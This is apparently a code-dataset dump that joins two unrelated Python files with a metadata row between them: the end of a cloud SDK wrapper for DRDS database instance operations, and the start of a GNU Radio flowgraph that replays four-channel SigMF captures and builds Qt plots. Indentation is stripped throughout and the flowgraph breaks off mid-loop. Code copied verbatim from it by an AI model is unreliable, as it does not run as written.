def rollback_instance_version(self, **params):
_params = _transfer_params(params)
return self._client.rollback_instance_version(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def set_backup_local(self, **params):
_params = _transfer_params(params)
return self._client.set_backup_local(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def set_backup_policy(self, **params):
_params = _transfer_params(params)
return self._client.set_backup_policy(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def setup_broadcast_tables(self, **params):
_params = _transfer_params(params)
return self._client.setup_broadcast_tables(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def setup_params(self, **params):
_params = _transfer_params(params)
return self._client.setup_drds_params(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def setup_recycle_bin_status(self, **params):
_params = _transfer_params(params)
return self._client.setup_recycle_bin_status(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def setup_table(self, **params):
_params = _transfer_params(params)
return self._client.setup_table(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def start_restore(self, **params):
_params = _transfer_params(params)
return self._client.start_restore(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def submit_clean_task(self, **params):
_params = _transfer_params(params)
return self._client.submit_clean_task(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def submit_hot_expand_pre_check_task(self, **params):
_params = _transfer_params(params)
return self._client.submit_hot_expand_pre_check_task(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def submit_hot_expand_task(self, **params):
_params = _transfer_params(params)
return self._client.submit_hot_expand_task(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def submit_rollback_task(self, **params):
_params = _transfer_params(params)
return self._client.submit_rollback_task(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def submit_smooth_expand_pre_check(self, **params):
_params = _transfer_params(params)
return self._client.submit_smooth_expand_pre_check(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def submit_smooth_expand_pre_check_task(self, **params):
_params = _transfer_params(params)
return self._client.submit_smooth_expand_pre_check_task(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def submit_smooth_expand_task(self, **params):
_params = _transfer_params(params)
return self._client.submit_smooth_expand_task(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def submit_sql_flashback_task(self, **params):
_params = _transfer_params(params)
return self._client.submit_sql_flashback_task(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def submit_switch_task(self, **params):
_params = _transfer_params(params)
return self._client.submit_switch_task(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def switch_global_broadcast_type(self, **params):
_params = _transfer_params(params)
return self._client.switch_global_broadcast_type(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def update_instance_network(self, **params):
_params = _transfer_params(params)
return self._client.update_instance_network(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def upgrade_hi_store_instance(self, **params):
_params = _transfer_params(params)
return self._client.upgrade_hi_store_instance(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def upgrade_instance_version(self, **params):
_params = _transfer_params(params)
return self._client.upgrade_instance_version(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def validate_shard_task(self, **params):
_params = _transfer_params(params)
return self._client.validate_shard_task(
instance_internet_address_name=self.instance_internet_address_name, **_params)
class _DRDSRegionResource(ServiceResource):
def __init__(self, region_id, _client=None):
ServiceResource.__init__(self, "drds.region", _client=_client)
self.region_id = region_id
self.region_endpoint = None
self.region_name = None
| 46.870423 | 90 | 0.743584 | 3,839 | 33,278 | 5.859859 | 0.056786 | 0.189189 | 0.271959 | 0.314456 | 0.900649 | 0.883624 | 0.875978 | 0.870288 | 0.869932 | 0.858108 | 0 | 0.000367 | 0.181201 | 33,278 | 709 | 91 | 46.93653 | 0.825235 | 0.017279 | 0 | 0.476449 | 0 | 0 | 0.003671 | 0.001835 | 0 | 0 | 0 | 0 | 0 | 1 | 0.242754 | false | 0.003623 | 0.005435 | 0 | 0.490942 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
fa245654f338db7b5e2020764a59d223084a8c54 | 90,116 | py | Python | gr37/kerberos/kerberos_sigmf_playback3.py | zleffke/flowgraph_sandbox | 6bcad45fd4585e917678b843be323278ebf06323 | [
"MIT"
] | null | null | null | gr37/kerberos/kerberos_sigmf_playback3.py | zleffke/flowgraph_sandbox | 6bcad45fd4585e917678b843be323278ebf06323 | [
"MIT"
] | null | null | null | gr37/kerberos/kerberos_sigmf_playback3.py | zleffke/flowgraph_sandbox | 6bcad45fd4585e917678b843be323278ebf06323 | [
"MIT"
] | null | null | null | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
##################################################
# GNU Radio Python Flow Graph
# Title: Kerberos Sigmf Playback3
# GNU Radio version: 3.7.13.4
##################################################
if __name__ == '__main__':
import ctypes
import sys
if sys.platform.startswith('linux'):
try:
x11 = ctypes.cdll.LoadLibrary('libX11.so')
x11.XInitThreads()
except:
print "Warning: failed to XInitThreads()"
from PyQt4 import Qt
from PyQt4.QtCore import QObject, pyqtSlot
from gnuradio import analog
from gnuradio import blocks
from gnuradio import eng_notation
from gnuradio import fft
from gnuradio import filter
from gnuradio import gr
from gnuradio import qtgui
from gnuradio.eng_option import eng_option
from gnuradio.fft import window
from gnuradio.filter import firdes
from optparse import OptionParser
import adsb
import gr_sigmf
import pyqt
import sip
import sys
from gnuradio import qtgui
class kerberos_sigmf_playback3(gr.top_block, Qt.QWidget):
def __init__(self):
gr.top_block.__init__(self, "Kerberos Sigmf Playback3")
Qt.QWidget.__init__(self)
self.setWindowTitle("Kerberos Sigmf Playback3")
qtgui.util.check_set_qss()
try:
self.setWindowIcon(Qt.QIcon.fromTheme('gnuradio-grc'))
except:
pass
self.top_scroll_layout = Qt.QVBoxLayout()
self.setLayout(self.top_scroll_layout)
self.top_scroll = Qt.QScrollArea()
self.top_scroll.setFrameStyle(Qt.QFrame.NoFrame)
self.top_scroll_layout.addWidget(self.top_scroll)
self.top_scroll.setWidgetResizable(True)
self.top_widget = Qt.QWidget()
self.top_scroll.setWidget(self.top_widget)
self.top_layout = Qt.QVBoxLayout(self.top_widget)
self.top_grid_layout = Qt.QGridLayout()
self.top_layout.addLayout(self.top_grid_layout)
self.settings = Qt.QSettings("GNU Radio", "kerberos_sigmf_playback3")
self.restoreGeometry(self.settings.value("geometry").toByteArray())
##################################################
# Variables
##################################################
self.trig_delay = trig_delay = 0.001
self.trig_channel = trig_channel = 0
self.throttle = throttle = 2
self.thresh = thresh = 50
self.samp_rate = samp_rate = 2e6
self.nfft = nfft = 8192
self.delay_3 = delay_3 = 1788
self.delay_2 = delay_2 = 5261
self.delay_1 = delay_1 = 734
self.delay_0 = delay_0 = 0
self.corr_alpha_0_3 = corr_alpha_0_3 = 0.01
self.corr_alpha_0_2 = corr_alpha_0_2 = 0.01
self.corr_alpha_0_1 = corr_alpha_0_1 = 0.01
##################################################
# Blocks
##################################################
self.main_tab = Qt.QTabWidget()
self.main_tab_widget_0 = Qt.QWidget()
self.main_tab_layout_0 = Qt.QBoxLayout(Qt.QBoxLayout.TopToBottom, self.main_tab_widget_0)
self.main_tab_grid_layout_0 = Qt.QGridLayout()
self.main_tab_layout_0.addLayout(self.main_tab_grid_layout_0)
self.main_tab.addTab(self.main_tab_widget_0, 'Channel')
self.main_tab_widget_1 = Qt.QWidget()
self.main_tab_layout_1 = Qt.QBoxLayout(Qt.QBoxLayout.TopToBottom, self.main_tab_widget_1)
self.main_tab_grid_layout_1 = Qt.QGridLayout()
self.main_tab_layout_1.addLayout(self.main_tab_grid_layout_1)
self.main_tab.addTab(self.main_tab_widget_1, 'Coarse Adjust')
self.main_tab_widget_2 = Qt.QWidget()
self.main_tab_layout_2 = Qt.QBoxLayout(Qt.QBoxLayout.TopToBottom, self.main_tab_widget_2)
self.main_tab_grid_layout_2 = Qt.QGridLayout()
self.main_tab_layout_2.addLayout(self.main_tab_grid_layout_2)
self.main_tab.addTab(self.main_tab_widget_2, 'Correlate')
self.main_tab_widget_3 = Qt.QWidget()
self.main_tab_layout_3 = Qt.QBoxLayout(Qt.QBoxLayout.TopToBottom, self.main_tab_widget_3)
self.main_tab_grid_layout_3 = Qt.QGridLayout()
self.main_tab_layout_3.addLayout(self.main_tab_grid_layout_3)
self.main_tab.addTab(self.main_tab_widget_3, 'Decode')
self.top_grid_layout.addWidget(self.main_tab, 0, 0, 1, 2)
for r in range(0, 1):
self.top_grid_layout.setRowStretch(r, 1)
for c in range(0, 2):
self.top_grid_layout.setColumnStretch(c, 1)
self._trig_delay_tool_bar = Qt.QToolBar(self)
self._trig_delay_tool_bar.addWidget(Qt.QLabel("trig_delay"+": "))
self._trig_delay_line_edit = Qt.QLineEdit(str(self.trig_delay))
self._trig_delay_tool_bar.addWidget(self._trig_delay_line_edit)
self._trig_delay_line_edit.returnPressed.connect(
lambda: self.set_trig_delay(eng_notation.str_to_num(str(self._trig_delay_line_edit.text().toAscii()))))
self.main_tab_grid_layout_1.addWidget(self._trig_delay_tool_bar, 2, 1, 1, 1)
for r in range(2, 3):
self.main_tab_grid_layout_1.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_1.setColumnStretch(c, 1)
self._trig_channel_options = (0, 1, 2, 3, )
self._trig_channel_labels = ('chan0', 'chan1', 'chan2', 'chan3', )
self._trig_channel_tool_bar = Qt.QToolBar(self)
self._trig_channel_tool_bar.addWidget(Qt.QLabel("trig_channel"+": "))
self._trig_channel_combo_box = Qt.QComboBox()
self._trig_channel_tool_bar.addWidget(self._trig_channel_combo_box)
for label in self._trig_channel_labels: self._trig_channel_combo_box.addItem(label)
self._trig_channel_callback = lambda i: Qt.QMetaObject.invokeMethod(self._trig_channel_combo_box, "setCurrentIndex", Qt.Q_ARG("int", self._trig_channel_options.index(i)))
self._trig_channel_callback(self.trig_channel)
self._trig_channel_combo_box.currentIndexChanged.connect(
lambda i: self.set_trig_channel(self._trig_channel_options[i]))
self.main_tab_grid_layout_1.addWidget(self._trig_channel_tool_bar, 2, 0, 1, 1)
for r in range(2, 3):
self.main_tab_grid_layout_1.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_1.setColumnStretch(c, 1)
self._throttle_tool_bar = Qt.QToolBar(self)
self._throttle_tool_bar.addWidget(Qt.QLabel('Throttle'+": "))
self._throttle_line_edit = Qt.QLineEdit(str(self.throttle))
self._throttle_tool_bar.addWidget(self._throttle_line_edit)
self._throttle_line_edit.returnPressed.connect(
lambda: self.set_throttle(eng_notation.str_to_num(str(self._throttle_line_edit.text().toAscii()))))
self.top_grid_layout.addWidget(self._throttle_tool_bar, 9, 1, 1, 1)
for r in range(9, 10):
self.top_grid_layout.setRowStretch(r, 1)
for c in range(1, 2):
self.top_grid_layout.setColumnStretch(c, 1)
self._thresh_tool_bar = Qt.QToolBar(self)
self._thresh_tool_bar.addWidget(Qt.QLabel('GUI Threshold'+": "))
self._thresh_line_edit = Qt.QLineEdit(str(self.thresh))
self._thresh_tool_bar.addWidget(self._thresh_line_edit)
self._thresh_line_edit.returnPressed.connect(
lambda: self.set_thresh(eng_notation.str_to_num(str(self._thresh_line_edit.text().toAscii()))))
self.top_grid_layout.addWidget(self._thresh_tool_bar, 9, 0, 1, 1)
for r in range(9, 10):
self.top_grid_layout.setRowStretch(r, 1)
for c in range(0, 1):
self.top_grid_layout.setColumnStretch(c, 1)
self._delay_3_tool_bar = Qt.QToolBar(self)
self._delay_3_tool_bar.addWidget(Qt.QLabel("delay_3"+": "))
self._delay_3_line_edit = Qt.QLineEdit(str(self.delay_3))
self._delay_3_tool_bar.addWidget(self._delay_3_line_edit)
self._delay_3_line_edit.returnPressed.connect(
lambda: self.set_delay_3(int(str(self._delay_3_line_edit.text().toAscii()))))
self.main_tab_grid_layout_1.addWidget(self._delay_3_tool_bar, 1, 3, 1, 1)
for r in range(1, 2):
self.main_tab_grid_layout_1.setRowStretch(r, 1)
for c in range(3, 4):
self.main_tab_grid_layout_1.setColumnStretch(c, 1)
self._delay_2_tool_bar = Qt.QToolBar(self)
self._delay_2_tool_bar.addWidget(Qt.QLabel("delay_2"+": "))
self._delay_2_line_edit = Qt.QLineEdit(str(self.delay_2))
self._delay_2_tool_bar.addWidget(self._delay_2_line_edit)
self._delay_2_line_edit.returnPressed.connect(
lambda: self.set_delay_2(int(str(self._delay_2_line_edit.text().toAscii()))))
self.main_tab_grid_layout_1.addWidget(self._delay_2_tool_bar, 1, 2, 1, 1)
for r in range(1, 2):
self.main_tab_grid_layout_1.setRowStretch(r, 1)
for c in range(2, 3):
self.main_tab_grid_layout_1.setColumnStretch(c, 1)
self._delay_1_tool_bar = Qt.QToolBar(self)
self._delay_1_tool_bar.addWidget(Qt.QLabel("delay_1"+": "))
self._delay_1_line_edit = Qt.QLineEdit(str(self.delay_1))
self._delay_1_tool_bar.addWidget(self._delay_1_line_edit)
self._delay_1_line_edit.returnPressed.connect(
lambda: self.set_delay_1(int(str(self._delay_1_line_edit.text().toAscii()))))
self.main_tab_grid_layout_1.addWidget(self._delay_1_tool_bar, 1, 1, 1, 1)
for r in range(1, 2):
self.main_tab_grid_layout_1.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_1.setColumnStretch(c, 1)
self._delay_0_tool_bar = Qt.QToolBar(self)
self._delay_0_tool_bar.addWidget(Qt.QLabel("delay_0"+": "))
self._delay_0_line_edit = Qt.QLineEdit(str(self.delay_0))
self._delay_0_tool_bar.addWidget(self._delay_0_line_edit)
self._delay_0_line_edit.returnPressed.connect(
lambda: self.set_delay_0(int(str(self._delay_0_line_edit.text().toAscii()))))
self.main_tab_grid_layout_1.addWidget(self._delay_0_tool_bar, 1, 0, 1, 1)
for r in range(1, 2):
self.main_tab_grid_layout_1.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_1.setColumnStretch(c, 1)
self._corr_alpha_0_3_tool_bar = Qt.QToolBar(self)
self._corr_alpha_0_3_tool_bar.addWidget(Qt.QLabel("corr_alpha_0_3"+": "))
self._corr_alpha_0_3_line_edit = Qt.QLineEdit(str(self.corr_alpha_0_3))
self._corr_alpha_0_3_tool_bar.addWidget(self._corr_alpha_0_3_line_edit)
self._corr_alpha_0_3_line_edit.returnPressed.connect(
lambda: self.set_corr_alpha_0_3(eng_notation.str_to_num(str(self._corr_alpha_0_3_line_edit.text().toAscii()))))
self.main_tab_grid_layout_2.addWidget(self._corr_alpha_0_3_tool_bar, 8, 2, 1, 1)
for r in range(8, 9):
self.main_tab_grid_layout_2.setRowStretch(r, 1)
for c in range(2, 3):
self.main_tab_grid_layout_2.setColumnStretch(c, 1)
self._corr_alpha_0_2_tool_bar = Qt.QToolBar(self)
self._corr_alpha_0_2_tool_bar.addWidget(Qt.QLabel("corr_alpha_0_2"+": "))
self._corr_alpha_0_2_line_edit = Qt.QLineEdit(str(self.corr_alpha_0_2))
self._corr_alpha_0_2_tool_bar.addWidget(self._corr_alpha_0_2_line_edit)
self._corr_alpha_0_2_line_edit.returnPressed.connect(
lambda: self.set_corr_alpha_0_2(eng_notation.str_to_num(str(self._corr_alpha_0_2_line_edit.text().toAscii()))))
self.main_tab_grid_layout_2.addWidget(self._corr_alpha_0_2_tool_bar, 8, 1, 1, 1)
for r in range(8, 9):
self.main_tab_grid_layout_2.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_2.setColumnStretch(c, 1)
self._corr_alpha_0_1_tool_bar = Qt.QToolBar(self)
self._corr_alpha_0_1_tool_bar.addWidget(Qt.QLabel("corr_alpha_0_1"+": "))
self._corr_alpha_0_1_line_edit = Qt.QLineEdit(str(self.corr_alpha_0_1))
self._corr_alpha_0_1_tool_bar.addWidget(self._corr_alpha_0_1_line_edit)
self._corr_alpha_0_1_line_edit.returnPressed.connect(
lambda: self.set_corr_alpha_0_1(eng_notation.str_to_num(str(self._corr_alpha_0_1_line_edit.text().toAscii()))))
self.main_tab_grid_layout_2.addWidget(self._corr_alpha_0_1_tool_bar, 8, 0, 1, 1)
for r in range(8, 9):
self.main_tab_grid_layout_2.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_2.setColumnStretch(c, 1)
self.single_pole_iir_filter_xx_0_0_0 = filter.single_pole_iir_filter_ff(corr_alpha_0_3, nfft)
self.single_pole_iir_filter_xx_0_0 = filter.single_pole_iir_filter_ff(corr_alpha_0_2, nfft)
self.single_pole_iir_filter_xx_0 = filter.single_pole_iir_filter_ff(corr_alpha_0_1, nfft)
self.sigmf_source_3 = gr_sigmf.source('/home/zleffke/captures/kerberos/20210330/2200/CHAN3_2021-03-30T22:00:02Z.sigmf-data', "cf32" + ("_le" if sys.byteorder == "little" else "_be"), True)
self.sigmf_source_2 = gr_sigmf.source('/home/zleffke/captures/kerberos/20210330/2200/CHAN2_2021-03-30T22:00:02Z.sigmf-data', "cf32" + ("_le" if sys.byteorder == "little" else "_be"), True)
self.sigmf_source_1 = gr_sigmf.source('/home/zleffke/captures/kerberos/20210330/2200/CHAN1_2021-03-30T22:00:02Z.sigmf-data', "cf32" + ("_le" if sys.byteorder == "little" else "_be"), True)
self.sigmf_source_0 = gr_sigmf.source('/home/zleffke/captures/kerberos/20210330/2200/CHAN0_2021-03-30T22:00:02Z.sigmf-data', "cf32" + ("_le" if sys.byteorder == "little" else "_be"), True)
self.qtgui_waterfall_sink_x_0_0_1 = qtgui.waterfall_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_waterfall_sink_x_0_0_1.set_update_time(0.010)
self.qtgui_waterfall_sink_x_0_0_1.enable_grid(False)
self.qtgui_waterfall_sink_x_0_0_1.enable_axis_labels(True)
if not True:
self.qtgui_waterfall_sink_x_0_0_1.disable_legend()
if "complex" == "float" or "complex" == "msg_float":
self.qtgui_waterfall_sink_x_0_0_1.set_plot_pos_half(not True)
labels = ['', '', '', '', '',
'', '', '', '', '']
colors = [0, 0, 0, 0, 0,
0, 0, 0, 0, 0]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_waterfall_sink_x_0_0_1.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_waterfall_sink_x_0_0_1.set_line_label(i, labels[i])
self.qtgui_waterfall_sink_x_0_0_1.set_color_map(i, colors[i])
self.qtgui_waterfall_sink_x_0_0_1.set_line_alpha(i, alphas[i])
self.qtgui_waterfall_sink_x_0_0_1.set_intensity_range(-100, 10)
self._qtgui_waterfall_sink_x_0_0_1_win = sip.wrapinstance(self.qtgui_waterfall_sink_x_0_0_1.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_waterfall_sink_x_0_0_1_win, 2, 3, 2, 1)
for r in range(2, 4):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(3, 4):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_waterfall_sink_x_0_0_0 = qtgui.waterfall_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_waterfall_sink_x_0_0_0.set_update_time(0.010)
self.qtgui_waterfall_sink_x_0_0_0.enable_grid(False)
self.qtgui_waterfall_sink_x_0_0_0.enable_axis_labels(True)
if not True:
self.qtgui_waterfall_sink_x_0_0_0.disable_legend()
if "complex" == "float" or "complex" == "msg_float":
self.qtgui_waterfall_sink_x_0_0_0.set_plot_pos_half(not True)
labels = ['', '', '', '', '',
'', '', '', '', '']
colors = [0, 0, 0, 0, 0,
0, 0, 0, 0, 0]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_waterfall_sink_x_0_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_waterfall_sink_x_0_0_0.set_line_label(i, labels[i])
self.qtgui_waterfall_sink_x_0_0_0.set_color_map(i, colors[i])
self.qtgui_waterfall_sink_x_0_0_0.set_line_alpha(i, alphas[i])
self.qtgui_waterfall_sink_x_0_0_0.set_intensity_range(-100, 10)
self._qtgui_waterfall_sink_x_0_0_0_win = sip.wrapinstance(self.qtgui_waterfall_sink_x_0_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_waterfall_sink_x_0_0_0_win, 2, 2, 2, 1)
for r in range(2, 4):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(2, 3):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_waterfall_sink_x_0_0 = qtgui.waterfall_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_waterfall_sink_x_0_0.set_update_time(0.010)
self.qtgui_waterfall_sink_x_0_0.enable_grid(False)
self.qtgui_waterfall_sink_x_0_0.enable_axis_labels(True)
if not True:
self.qtgui_waterfall_sink_x_0_0.disable_legend()
if "complex" == "float" or "complex" == "msg_float":
self.qtgui_waterfall_sink_x_0_0.set_plot_pos_half(not True)
labels = ['', '', '', '', '',
'', '', '', '', '']
colors = [0, 0, 0, 0, 0,
0, 0, 0, 0, 0]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_waterfall_sink_x_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_waterfall_sink_x_0_0.set_line_label(i, labels[i])
self.qtgui_waterfall_sink_x_0_0.set_color_map(i, colors[i])
self.qtgui_waterfall_sink_x_0_0.set_line_alpha(i, alphas[i])
self.qtgui_waterfall_sink_x_0_0.set_intensity_range(-100, 10)
self._qtgui_waterfall_sink_x_0_0_win = sip.wrapinstance(self.qtgui_waterfall_sink_x_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_waterfall_sink_x_0_0_win, 2, 1, 2, 1)
for r in range(2, 4):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_waterfall_sink_x_0 = qtgui.waterfall_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_waterfall_sink_x_0.set_update_time(0.010)
self.qtgui_waterfall_sink_x_0.enable_grid(False)
self.qtgui_waterfall_sink_x_0.enable_axis_labels(True)
if not True:
self.qtgui_waterfall_sink_x_0.disable_legend()
if "complex" == "float" or "complex" == "msg_float":
self.qtgui_waterfall_sink_x_0.set_plot_pos_half(not True)
labels = ['', '', '', '', '',
'', '', '', '', '']
colors = [0, 0, 0, 0, 0,
0, 0, 0, 0, 0]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_waterfall_sink_x_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_waterfall_sink_x_0.set_line_label(i, labels[i])
self.qtgui_waterfall_sink_x_0.set_color_map(i, colors[i])
self.qtgui_waterfall_sink_x_0.set_line_alpha(i, alphas[i])
self.qtgui_waterfall_sink_x_0.set_intensity_range(-100, 10)
self._qtgui_waterfall_sink_x_0_win = sip.wrapinstance(self.qtgui_waterfall_sink_x_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_waterfall_sink_x_0_win, 2, 0, 2, 1)
for r in range(2, 4):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_vector_sink_f_0 = qtgui.vector_sink_f(
nfft,
0,
1.0,
"x-Axis",
"y-Axis",
"Correlation",
3 # Number of inputs
)
self.qtgui_vector_sink_f_0.set_update_time(0.10)
self.qtgui_vector_sink_f_0.set_y_axis(-140, 10)
self.qtgui_vector_sink_f_0.enable_autoscale(True)
self.qtgui_vector_sink_f_0.enable_grid(True)
self.qtgui_vector_sink_f_0.set_x_axis_units("")
self.qtgui_vector_sink_f_0.set_y_axis_units("")
self.qtgui_vector_sink_f_0.set_ref_level(0)
labels = ['0 to 1', '0 to 2', '0 to 3', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "dark blue"]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(3):
if len(labels[i]) == 0:
self.qtgui_vector_sink_f_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_vector_sink_f_0.set_line_label(i, labels[i])
self.qtgui_vector_sink_f_0.set_line_width(i, widths[i])
self.qtgui_vector_sink_f_0.set_line_color(i, colors[i])
self.qtgui_vector_sink_f_0.set_line_alpha(i, alphas[i])
self._qtgui_vector_sink_f_0_win = sip.wrapinstance(self.qtgui_vector_sink_f_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_2.addWidget(self._qtgui_vector_sink_f_0_win, 0, 0, 4, 3)
for r in range(0, 4):
self.main_tab_grid_layout_2.setRowStretch(r, 1)
for c in range(0, 3):
self.main_tab_grid_layout_2.setColumnStretch(c, 1)
self.qtgui_time_sink_x_1 = qtgui.time_sink_f(
128, #size
samp_rate / nfft, #samp_rate
"Correlation Magnitude", #name
3 #number of inputs
)
self.qtgui_time_sink_x_1.set_update_time(0.10)
self.qtgui_time_sink_x_1.set_y_axis(-1, 1)
self.qtgui_time_sink_x_1.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_1.enable_tags(-1, True)
self.qtgui_time_sink_x_1.set_trigger_mode(qtgui.TRIG_MODE_FREE, qtgui.TRIG_SLOPE_POS, 0.0, 0, 0, "")
self.qtgui_time_sink_x_1.enable_autoscale(True)
self.qtgui_time_sink_x_1.enable_grid(True)
self.qtgui_time_sink_x_1.enable_axis_labels(True)
self.qtgui_time_sink_x_1.enable_control_panel(False)
self.qtgui_time_sink_x_1.enable_stem_plot(False)
if not True:
self.qtgui_time_sink_x_1.disable_legend()
labels = ['0 to 1', '0 to 2', '0 to 3', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [-1, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(3):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_1.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_1.set_line_label(i, labels[i])
self.qtgui_time_sink_x_1.set_line_width(i, widths[i])
self.qtgui_time_sink_x_1.set_line_color(i, colors[i])
self.qtgui_time_sink_x_1.set_line_style(i, styles[i])
self.qtgui_time_sink_x_1.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_1.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_1_win = sip.wrapinstance(self.qtgui_time_sink_x_1.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_2.addWidget(self._qtgui_time_sink_x_1_win, 4, 0, 4, 3)
for r in range(4, 8):
self.main_tab_grid_layout_2.setRowStretch(r, 1)
for c in range(0, 3):
self.main_tab_grid_layout_2.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1_0_0_0_0_0 = qtgui.time_sink_f(
int(samp_rate*150e-6), #size
int(samp_rate), #samp_rate
"Combined", #name
2 #number of inputs
)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_update_time(0.01)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_y_axis(0, 1)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_1_0_0_0_0_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_trigger_mode(qtgui.TRIG_MODE_TAG, qtgui.TRIG_SLOPE_POS, 0, 1.25e-6, 0, "burst")
self.qtgui_time_sink_x_0_1_0_0_0_0_0.enable_autoscale(True)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.enable_grid(True)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.enable_control_panel(False)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.enable_stem_plot(False)
if not False:
self.qtgui_time_sink_x_0_1_0_0_0_0_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [0, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(2):
if len(labels[i]) == 0:
